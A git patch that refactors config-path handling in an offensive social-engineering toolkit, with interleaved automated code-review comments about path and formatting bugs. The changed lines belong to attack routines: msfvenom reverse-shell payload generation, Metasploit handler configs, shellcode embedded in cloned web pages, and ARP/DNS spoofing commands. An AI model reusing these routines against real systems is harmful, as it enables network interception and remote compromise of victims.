From d719ebb8b883cea5c3c337c34c0522a90c4a1849 Mon Sep 17 00:00:00 2001 From: Brigham Toskin Date: Thu, 1 Feb 2018 10:30:26 -0800 Subject: [PATCH] Normalize user config path usage with string append and os.path.join(). --- modules/ratte_module.py | 14 +- seproxy | 2 +- src/autorun/autolaunch.py | 4 +- src/core/arp_cache/arp.py | 10 +- src/core/fasttrack.py | 6 +- src/core/payloadgen/create_payloads.py | 126 +++++++++--------- src/core/payloadgen/solo.py | 8 +- src/core/payloadprep.py | 120 ++++++++--------- src/core/set.py | 84 ++++++------ src/core/setcore.py | 2 +- src/core/ssl/setssl.py | 2 +- src/fasttrack/mssql.py | 2 +- src/fasttrack/psexec.py | 2 +- src/html/spawn.py | 114 ++++++++-------- src/payloads/powershell/prep.py | 30 ++--- src/payloads/set_payloads/listener.py | 48 +++---- src/phishing/smtp/client/smtp_client.py | 76 +++++------ src/teensy/binary2teensy.py | 14 +- src/teensy/teensy.py | 4 +- src/webattack/browser_exploits/gen_payload.py | 24 ++-- src/webattack/dll_hijacking/hijacking.py | 16 +-- src/webattack/harvester/harvester.py | 60 ++++----- src/webattack/harvester/report_generator.py | 30 ++--- src/webattack/harvester/scraper.py | 22 +-- src/webattack/hta/main.py | 6 +- src/webattack/multi_attack/multiattack.py | 10 +- src/webattack/tabnabbing/tabnabbing.py | 16 +-- src/webattack/web_clone/cloner.py | 98 +++++++------- 28 files changed, 475 insertions(+), 475 deletions(-) diff --git a/modules/ratte_module.py b/modules/ratte_module.py index 9d260546b..c7e358d5a 100755 --- a/modules/ratte_module.py +++ b/modules/ratte_module.py @@ -35,7 +35,7 @@ except NameError: pass definepath = os.getcwd() -setdir = core.userconfigpath +userconfigpath = core.userconfigpath MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first" 
@@ -100,10 +100,10 @@ def java_applet_attack_tw(website, port, directory, ipaddr): ############################################ # this part is needed to rename the msf.exe file to a randomly generated one - if os.path.isfile(os.path.join(setdir, "/rand_gen")): + if os.path.isfile(os.path.join(userconfigpath, "rand_gen")): # open the file # start a loop - with open(os.path.join(setdir, "rand_gen")) as fileopen: + with open(os.path.join(userconfigpath, "rand_gen")) as fileopen: for line in fileopen: # define executable name and rename it filename = line.rstrip() @@ -111,7 +111,7 @@ def java_applet_attack_tw(website, port, directory, ipaddr): subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait() # lastly we need to copy over the signed applet - subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir, directory), shell=True).wait() + subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait() # TODO index.html parsen und IPADDR:Port ersetzen with open(os.path.join(directory, "index.html"), "rb") as fileopen: @@ -148,7 +148,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe): ############ # PATCH Server IP into RATTE ############ - with open(os.path.join(setdir, "ratteM.exe"), 'wb') as filewrite: + with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" 
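Review bot: The added line `subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait()` still builds a shell command by interpolating two paths, so a config path containing a space or a shell metacharacter breaks the copy, and because both streams go to /dev/null the failure is invisible — while the rest of this hunk has already moved to `os.path.join`. `shutil.copy(os.path.join(userconfigpath, "Signed_Update.jar"), directory)` performs the same copy with no shell and surfaces a failed copy as an exception instead of discarding it. The `cp src/payloads/ratte/ratte.binary %s/%s` line just above has the same shape but is outside what the commit touched. java_applet_attack_tw's body continues outside both hunks.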
@@ -271,10 +271,10 @@ def main(): core.print_info("Starting java applet attack...") java_applet_attack_tw(website, javaport, "reports/", ipaddr) - with open(os.path.join(setdir, definepath, "/rand_gen")) as fileopen: + with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen: for line in fileopen: ratte_random = line.rstrip() - subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(setdir, definepath), definepath, ratte_random), shell=True).wait() + subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait() ####################### # start ratteserver diff --git a/seproxy b/seproxy index 0fb549bf7..bcdd85bed 100755 --- a/seproxy +++ b/seproxy @@ -45,7 +45,7 @@ if operating_system == "posix": else: proxy_string = "export http_proxy='http://{0}'".format(proxy) - with open(os.path.join(core.userconfigpath, "/proxy.config"), "w") as filewrite: + with open(os.path.join(core.userconfigpath, "proxy.config"), "w") as filewrite: filewrite.write(proxy_string) def kill_proc(port, flag): diff --git a/src/autorun/autolaunch.py b/src/autorun/autolaunch.py index 14f17f7ac..0dc5172d5 100644 --- a/src/autorun/autolaunch.py +++ b/src/autorun/autolaunch.py @@ -33,11 +33,11 @@ if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")): os.path.join(core.userconfigpath, "template.pdf")), shell=True).wait() -if os.path.isfile(os.path.join(core.userconfigpath, "/dll/openthis.wab")): +if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")): subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;" "cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path, - os.path.join(core.userconfigpath, "/dll/*")), + os.path.join(core.userconfigpath, "dll/*")), shell=True).wait() trigger = 3 diff --git a/src/core/arp_cache/arp.py b/src/core/arp_cache/arp.py index b29f0a8f8..4cc4a8fd6 100755 --- a/src/core/arp_cache/arp.py 
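Review bot: `os.path.join(userconfigpath, definepath, "/rand_gen")` on the added line still passes an absolute final component, so os.path.join discards everything before it and the file opened is `/rand_gen` at the filesystem root, not the one java_applet_attack_tw reads via `os.path.join(userconfigpath, "rand_gen")` in the earlier hunk; likewise `definepath` is `os.getcwd()` (absolute, per the first hunk), so `os.path.join(userconfigpath, definepath)` in the cp line resolves to definepath alone and ratteM.exe is looked for in the wrong directory. Given where the earlier hunks write rand_gen and ratteM.exe, the two lines should read `with open(os.path.join(userconfigpath, "rand_gen")) as fileopen:` and `subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (userconfigpath, definepath, ratte_random), shell=True).wait()`. main's body continues outside the hunk.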
+++ b/src/core/arp_cache/arp.py @@ -105,7 +105,7 @@ if ettercapchoice == 'y': # spawn a child process os.chdir(cwd) time.sleep(5) - filewrite = open(setdir + "/ettercap", "w") + filewrite = open(userconfigpath + "ettercap", "w") filewrite.write( "ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge)) filewrite.close() @@ -147,8 +147,8 @@ if dsniffchoice == 'y': if dns_spoof == "": dns_spoof = "*" subprocess.Popen( - "rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (setdir), shell=True).wait() - filewrite = open(setdir + "/dnsspoof.conf", "w") + "rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait() + filewrite = open(userconfigpath + "dnsspoof.conf", "w") filewrite.write("%s %s" % (ipaddr, dns_spoof)) filewrite.close() print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!") @@ -160,10 +160,10 @@ if dsniffchoice == 'y': gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % ( interface), shell=True, stdout=subprocess.PIPE).communicate()[0] # open file for writing - filewrite = open(setdir + "/ettercap", "w") + filewrite = open(userconfigpath + "ettercap", "w") # write the arpspoof / dnsspoof commands to file filewrite.write( - "arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, setdir)) + "arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath)) # close the file filewrite.close() # change back to normal directory diff --git a/src/core/fasttrack.py b/src/core/fasttrack.py index 50e88a547..4e2c6241e 100644 --- a/src/core/fasttrack.py +++ b/src/core/fasttrack.py @@ -263,7 +263,7 @@ try: # specify we are using the fasttrack # option, this disables some features filewrite = open( - setdir + "/fasttrack.options", "w") + userconfigpath + "fasttrack.options", "w") filewrite.write("none") filewrite.close() # import fasttrack 
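Review bot: In the `@@ -147,8` hunk of src/core/arp_cache/arp.py the same file is addressed two ways on consecutive added lines: `"rm %s/dnsspoof.conf ..." % (userconfigpath)` inserts a separator, while `open(userconfigpath + "dnsspoof.conf", "w")` relies on userconfigpath already ending in one, so the two agree only when the value always carries a trailing slash (and then the first form yields a double slash, which POSIX tolerates). If userconfigpath is ever set without the slash, the append form creates `<parent-of-config-dir>dnsspoof.conf` beside the directory rather than inside it; `os.path.join(userconfigpath, "dnsspoof.conf")`, as the ratte_module.py and seproxy hunks already use, is correct either way. The same append-without-separator pattern recurs throughout this patch in src/core/fasttrack.py, src/core/payloadgen/create_payloads.py, src/core/payloadgen/solo.py and src/core/payloadprep.py, so if the append form is kept, whatever sets userconfigpath should document the trailing-slash invariant it now depends on. Where userconfigpath is brought into scope in arp.py is not visible in these hunks.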
@@ -439,10 +439,10 @@ try: # if we are using the built in one if dict == "": # write out a file - filewrite = open(setdir + "/dictionary.txt", "w") + filewrite = open(userconfigpath + "dictionary.txt", "w") filewrite.write("\nPassword1\nPassword!\nlc username") # specify the path - dict = setdir + "/dictionary.txt" + dict = userconfigpath + "dictionary.txt" filewrite.close() # if we are not brute forcing diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index b57f59a3d..33de37d7d 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -53,27 +53,27 @@ attack_vector = 0 linosx = 0 multiattack = "" # grab attack vector -if os.path.isfile(setdir + "/attack_vector"): - fileopen = open(setdir + "/attack_vector", "r") +if os.path.isfile(userconfigpath + "attack_vector"): + fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == "java": attack_vector = "java" if line == "multiattack": attack_vector = "multiattack" - multiattack = open(setdir + "/multi_payload", "w") + multiattack = open(userconfigpath + "multi_payload", "w") # here is a place holder for the multi attack java # multiattack outputs a file called multi_java if # this file is present it will allow additional # functionality multiattack_java = "off" -if os.path.isfile(setdir + "/multi_java"): +if os.path.isfile(userconfigpath + "multi_java"): multiattack_java = "on" # custom payloadgen payloadgen = "regular" -if os.path.isfile(setdir + "/payloadgen"): +if os.path.isfile(userconfigpath + "payloadgen"): payloadgen = "solo" # 
@@ -117,8 +117,8 @@ try: choice1 = "" # this is port choice3 = "" - if os.path.isfile(setdir + "/meterpreter_reverse_tcp_exe"): - fileopen = open(setdir + "/meterpreter_reverse_tcp_exe", "r") + if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"): + fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r") for line in fileopen: # this reads in the first line of the file which happens to be port # when calling through core @@ -182,7 +182,7 @@ try: encoder = 'false' payloadgen = 'solo' encode_stop = 1 - filewrite = open(setdir + "/set.payload", "w") + filewrite = open(userconfigpath + "set.payload", "w") # select setshell if choice1 == '3': filewrite.write("SETSHELL") @@ -217,11 +217,11 @@ try: # if we are using our own executable if custom == 1: - check_write = open(setdir + "/custom.exe", "w") + check_write = open(userconfigpath + "custom.exe", "w") check_write.write("VALID") check_write.close() shutil.copyfile("%s" % (choice1), "msf.exe") - shutil.copyfile("msf.exe", setdir + "/msf.exe") + shutil.copyfile("msf.exe", userconfigpath + "msf.exe") # Specify Encoding Option encoder = "false" @@ -232,12 +232,12 @@ try: if choice1 != "set/reverse_shell": # we need to rewrite index.html real quick because it has a parameter # that could get confusing - if os.path.isfile(setdir + "/web_clone/index.html"): - fileopen = open(setdir + "/web_clone/index.html", "r") + if os.path.isfile(userconfigpath + "web_clone/index.html"): + fileopen = open(userconfigpath + "web_clone/index.html", "r") data = fileopen.read() data = data.replace("freehugs", "") - os.remove(setdir + "/web_clone/index.html") - filewrite = open(setdir + "/web_clone/index.html", "w") + os.remove(userconfigpath + "web_clone/index.html") + filewrite = open(userconfigpath + "web_clone/index.html", "w") filewrite.write(data) filewrite.close() 
@@ -276,7 +276,7 @@ try: # if we are using the SET interactive shell then do this if choice1 == "set/reverse_shell": encoder = "false" - filewrite = open(setdir + "/set.payload.posix", "w") + filewrite = open(userconfigpath + "set.payload.posix", "w") filewrite.write("true") filewrite.close() import src.core.payloadprep @@ -330,7 +330,7 @@ try: if choice1 == "shellcode/alphanum": print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...") - subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, setdir), shell=True).wait() + subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait() if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi": # here we update set options to specify pyinjection and multipy 
@@ -339,16 +339,16 @@ try: # define, this will eventually be all of our payloads multipyinject_payload = "" # clean up old file - if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - os.remove("%s/meta_config_multipyinjector" % (setdir)) + if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): + os.remove("%s/meta_config_multipyinjector" % (userconfigpath)) # remove any old payload options - if os.path.isfile(setdir + "/payload.options.shellcode"): - os.remove(setdir + "/payload_options.shellcode") + if os.path.isfile(userconfigpath + "payload.options.shellcode"): + os.remove(userconfigpath + "payload_options.shellcode") # this is the file that gets saved with the payload and # port options - if choice1 != "cmd/multi": payload_options = open(setdir + "/payload_options.shellcode", "a") + if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a") while 1: # don't need any options here @@ -385,8 +385,8 @@ try: # here we prep our meta config to listen on all # the ports we want - free hugs all around - filewrite = open("%s/meta_config_multipyinjector" % (setdir), "a") - port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port) + filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a") + port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port) if port_check == False: filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port)) filewrite.close() 
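Review bot: The added pair `if os.path.isfile(userconfigpath + "payload.options.shellcode"): os.remove(userconfigpath + "payload_options.shellcode")` tests one filename (dot) and removes another (underscore), so the stale-options cleanup never fires, and the `open(userconfigpath + "payload_options.shellcode", "a")` a few lines further down then appends to whatever a previous run left behind. The comment above the pair says the intent is to remove old payload options, so the check should be `if os.path.isfile(userconfigpath + "payload_options.shellcode"):`. The enclosing `try:` and the `while 1:` loop continue outside the hunk.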
@@ -453,7 +453,7 @@ try: shellcode = encryptAES(secret, multipyinject_payload) print_status("Dynamic cipher key created and embedded into payload.") - filewrite = open("%s/meterpreter.alpha_decoded" % (setdir), "w") + filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w") filewrite.write(shellcode) filewrite.close() @@ -462,7 +462,7 @@ try: payload_options.close() # here we are going to encode the payload via base64 - fileopen = open("%s/meterpreter.alpha_decoded" % (setdir), "r") + fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r") data = fileopen.read() if payloadgen != "solo": # base64 1 @@ -489,7 +489,7 @@ try: # last one data = base64.b64encode(b'data') # - filewrite = open("%s/meterpreter.alpha" % (setdir), "w") + filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w") filewrite.write(str(data)) filewrite.close() if choice1 == "shellcode/alphanum": 
@@ -510,17 +510,17 @@ try: # write out the payload if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject": - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(fileopen) filewrite.close() - subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() + subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait() # we need to read in the old index.html file because its # already generated, need to present the alphanum to it - if os.path.isfile("%s/web_clone/index.html" % (setdir)): - fileopen = open("%s/web_clone/index.html" %(setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") - fileopen2 = open("%s/meterpreter.alpha" % (setdir), "r") + if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): + fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") + fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r") alpha_shellcode = fileopen2.read().rstrip() data = fileopen.read() data = data.replace( @@ -539,7 +539,7 @@ try: if choice1 == "shellcode/pyinject": print_status("Prepping website for pyInjector shellcode injection..") print_status("Base64 encoding shellcode and prepping for delivery..") - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait() if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1" choice3 = "1" 
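Review bot: The context line `if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":` at the top of the `@@ -510,17` hunk spells the third option differently from the `"shellcode/multipyinject"` compared in the `@@ -330,7` hunk, so the branch it guards (the msf.exe write and the shellcodeexec.custom copy on the added lines) is never taken for the multipyinject path; this looks like a typo for `"shellcode/multipyinject"`, which the rename left untouched. Since the body of that branch was rewritten here anyway, correcting the guard in the same change would avoid a second pass over this block. The enclosing `try:` continues outside the hunk.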
@@ -551,7 +551,7 @@ try: choice1 = choice9 # write out the payload for powershell injection to pick it up if used - filewrite = open(setdir + "/metasploit.payload", "w") + filewrite = open(userconfigpath + "metasploit.payload", "w") filewrite.write(choice1) filewrite.close() # import if on @@ -563,12 +563,12 @@ try: setshell_counter = 1 if setshell_counter == 0: if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": - if os.path.isfile("%s/web_clone/index.html" % (setdir)): + if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): if choice1 != "cmd/multi": try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep - if os.path.isfile("%s/x86.powershell" % (setdir)): - fileopen1 = open("%s/x86.powershell" % (setdir), "r") + if os.path.isfile("%s/x86.powershell" % (userconfigpath)): + fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r") x86 = fileopen1.read() x86 = "powershell -ec " + x86 @@ -586,8 +586,8 @@ try: print_status("Embedding commands into Java Applet parameters...") print_status("Note that these will be base64-encoded once, regardless of the payload..") - fileopen3 = open("%s/web_clone/index.html" % (setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") + fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # encode once, will need to decode later 
@@ -605,19 +605,19 @@ try: filewrite.write(data) filewrite.close() - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, shell=True).wait() + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait() # here we specify the binary to deploy if we are using ones that are # required to drop binaries if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi": - fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") + fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # check if we don't want to deploy binaries data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"') filewrite.write(data) filewrite.close() - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # specify attack vector as SET interactive shell if choice1 == "set/reverse_shell": @@ -657,7 +657,7 @@ try: if osx_path != "": # copy the payload - shutil.copyfile(osx_path, setdir + "/mac.bin") + shutil.copyfile(osx_path, userconfigpath + "mac.bin") # if linux payload if lin_path != "": @@ -672,7 +672,7 @@ try: if lin_path != "": # copy the payload - shutil.copyfile(lin_path, setdir + "/nix.bin") + shutil.copyfile(lin_path, userconfigpath + "nix.bin") else: 
@@ -680,9 +680,9 @@ try: osxpayload = check_config("OSX_PAYLOAD_DELIVERY=") linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=") print_status("Generating OSX payloads through Metasploit...") - subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() + subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() print_status("Generating Linux payloads through Metasploit...") - subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() + subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() if multiattack_java == "on": multiattack.write("OSX=" + str(port1) + "\n") multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload)) 
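Review bot: The rewritten OSX line `subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), ...)` supplies six arguments to a format string with five `%s`, which raises `TypeError: not all arguments converted during string formatting` as soon as this branch runs, and even if it did not, `meta_path()` would land in the `-p` slot. The Linux line two lines below has the correct shape; the OSX string should begin `r"%smsfvenom -p %s ..."` so that meta_path() prefixes the executable as it does there. The enclosing `try:` continues outside the hunk.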
@@ -691,24 +691,24 @@ try: osxcheck = check_options("MAC.BIN=") linuxcheck = check_options("NIX.BIN=") - shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck)) - shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck)) + shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck)) + shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck)) # try block here try: # if they want a listener, start here - if os.path.isfile("%s/meta_config" % (setdir)): + if os.path.isfile("%s/meta_config" % (userconfigpath)): # if its already created - filewrite = open("%s/meta_config" % (setdir), "a") + filewrite = open("%s/meta_config" % (userconfigpath), "a") - if not os.path.isfile("%s/meta_config" % (setdir)): + if not os.path.isfile("%s/meta_config" % (userconfigpath)): # if we need to create it - filewrite = open("%s/meta_config" % (setdir), "w") + filewrite = open("%s/meta_config" % (userconfigpath), "w") # if there isn't a multiattack metasploit, setup handler - if not os.path.isfile("%s/multi_meta" % (setdir)): + if not os.path.isfile("%s/multi_meta" % (userconfigpath)): - port_check = check_ports("%s/meta_config" % (setdir), choice3) + port_check = check_ports("%s/meta_config" % (userconfigpath), choice3) if port_check == False: filewrite.write("use exploit/multi/handler\n") filewrite.write("set PAYLOAD " + choice1 + "\n") @@ -726,10 +726,10 @@ try: # config option for using multiscript meterpreter if meterpreter_multi == "ON": - multiwrite = open(setdir + "/multi_meter.file", "w") + multiwrite = open(userconfigpath + "multi_meter.file", "w") multiwrite.write(meterpreter_multi_command) filewrite.write( - "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) + "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath)) multiwrite.close() filewrite.write("exploit -j\r\n\r\n") 
@@ -759,10 +759,10 @@ try: filewrite.write("set LPORT " + port2 + "\n") if linux_meterpreter_multi == "ON": multiwrite = open( - setdir + "/lin_multi_meter.file", "w") + userconfigpath + "lin_multi_meter.file", "w") multiwrite.write(linux_meterpreter_multi_command) filewrite.write( - "set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (setdir)) + "set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath)) multiwrite.close() filewrite.write("set ExitOnSession false\n") filewrite.write("exploit -j\r\n\r\n") @@ -781,11 +781,11 @@ except KeyboardInterrupt: # finish closing up the remenant files if attack_vector == "multiattack": multiattack.close() -if os.path.isfile("%s/fileformat.file" % (setdir)): - filewrite = open("%s/payload.options" % (setdir), "w") +if os.path.isfile("%s/fileformat.file" % (userconfigpath)): + filewrite = open("%s/payload.options" % (userconfigpath), "w") filewrite.write(choice1 + " " + ipaddr + " " + choice3) filewrite.close() if choice1 == "set/reverse_shell": - if os.path.isfile(setdir + "/meta_config"): - os.remove(setdir + "/meta_config") + if os.path.isfile(userconfigpath + "meta_config"): + os.remove(userconfigpath + "meta_config") diff --git a/src/core/payloadgen/solo.py b/src/core/payloadgen/solo.py index 9076ef582..b042ab600 100644 --- a/src/core/payloadgen/solo.py +++ b/src/core/payloadgen/solo.py 
@@ -16,14 +16,14 @@ meta_path = meta_path() def payload_generate(payload, lhost, port): # generate metasploit subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" % - (payload, lhost, port, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() + (payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() # write out the rc file - filewrite = open(setdir + "/meta_config", "w") + filewrite = open(userconfigpath + "meta_config", "w") filewrite.write( "use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port)) filewrite.close() print_status( - "Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe") + "Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe") show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2) payload = (raw_input(setprompt(["4"], ""))) @@ -49,4 +49,4 @@ if check_options("INFECTION_MEDIA=") != "ON": print_status( "Launching msfconsole, this could take a few to load. Be patient...") subprocess.Popen(meta_path + "msfconsole -r " + - setdir + "/meta_config", shell=True).wait() + userconfigpath + "meta_config", shell=True).wait() diff --git a/src/core/payloadprep.py b/src/core/payloadprep.py index 840166753..155aae323 100644 --- a/src/core/payloadprep.py +++ b/src/core/payloadprep.py 
@@ -43,12 +43,12 @@ for line in fileopen: "\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config") # make directory if it's not there -if not os.path.isdir(setdir + "/web_clone/"): - os.makedirs(setdir + "/web_clone/") +if not os.path.isdir(userconfigpath + "web_clone/"): + os.makedirs(userconfigpath + "web_clone/") # grab ip address and SET web server interface -if os.path.isfile(setdir + "/interface"): - fileopen = open(setdir + "interface", "r") +if os.path.isfile(userconfigpath + "interface"): + fileopen = open(userconfigpath + "interface", "r") for line in fileopen: ipaddr = line.rstrip() @@ -94,8 +94,8 @@ webserver = exe_name + " " + webserver # this is generated through payloadgen.py and lets SET know if its a RATTE # payload or SET payload -if os.path.isfile(setdir + "/set.payload"): - fileopen = open(setdir + "/set.payload", "r") +if os.path.isfile(userconfigpath + "set.payload"): + fileopen = open(userconfigpath + "set.payload", "r") for line in fileopen: payload_selection = line.rstrip() else: @@ -105,7 +105,7 @@ else: # determine if we want to target osx/nix as well posix = False # find if we selected it -if os.path.isfile(setdir + "/set.payload.posix"): +if os.path.isfile(userconfigpath + "set.payload.posix"): # if we have then claim true posix = True 
